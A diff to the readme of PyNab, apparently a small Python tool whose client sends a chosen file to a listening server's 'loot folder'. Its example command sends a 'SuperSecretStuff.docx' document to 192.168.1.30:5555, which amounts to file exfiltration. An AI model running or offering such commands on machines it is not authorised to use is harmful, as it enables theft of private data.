danthegoodman1/PyNab/readme.md

 Run like:

-    clientNab.py IP PORT FILELOCATION
+    python3 clientNab.py IP PORT FILELOCATION

 replacing `IP`, `PORT`, and `FILELOCATION` with the respective values

 Example use:

-    clientNab.py 192.168.1.30 5555 /Users/{some username}/Documents/SuperSecretStuff.docx
+    python3 clientNab.py 192.168.1.30 5555 /Users/{some username}/Documents/SuperSecretStuff.docx

-This will drop that file over to the root folder of where the `serverNab.py` file is running on the server.
+This will drop that file into a loot folder where the `serverNab.py` file is running on the server.

+This should also work for Python 2, but the print statements and encoding/decoding might need to be changed.

 ### Server: